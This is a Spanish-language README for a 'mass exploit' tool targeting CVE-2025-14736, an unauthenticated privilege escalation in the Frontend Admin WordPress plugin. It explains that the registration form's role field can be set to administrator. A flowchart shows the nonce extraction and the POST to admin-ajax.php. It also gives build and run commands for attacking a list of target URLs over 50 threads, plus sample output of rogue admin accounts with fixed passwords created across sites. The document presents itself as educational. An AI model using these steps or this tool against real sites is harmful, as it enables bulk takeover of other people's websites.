
Escalación de privilegios no autenticada a Administrador mediante el campo de formulario de rol
Autor: Hyun Chiya
| Campo | Valor |
|---|---|
| CVE ID | CVE-2025-14736 |
| Plugin | Frontend Admin by DynamiApps |
| Versiones Afectadas | <= 3.28.25 |
| Tipo de Vulnerabilidad | Escalada de Privilegios sin Autenticación |
| Gravedad | Crítica |
El plugin Frontend Admin para WordPress es vulnerable a una escalada de privilegios sin autenticación debido a una validación insuficiente en los campos controlados por el usuario durante el registro. Los atacantes pueden inyectar roles arbitrarios, incluido administrator, manipulando el payload de envío del formulario.
La lógica vulnerable reside en el manejo de los envíos de formularios donde el campo role se confía en la entrada del usuario sin verificar si el usuario está autorizado para asignar ese rol. Específicamente, el campo acff[user][field_user_role_ID] puede ser modificado a administrator.
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fff
go build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| Argumento | Descripción |
|---|---|
-l | Ruta a la lista de URLs objetivo (por defecto: list.txt) |
-t | Número de hilos concurrentes (por defecto: 10) |
-timeout | Tiempo de espera de solicitud en segundos (por defecto: 15) |
>> [ ONLINE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Mass Exploit Tool ║
║ Frontend Admin by DynamiApps Privilege Escalation ║
║ Author: Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...
[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32
[*] Scan complete.
Esta herramienta se proporciona solo con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Úsela con responsabilidad.
Hyun Chiya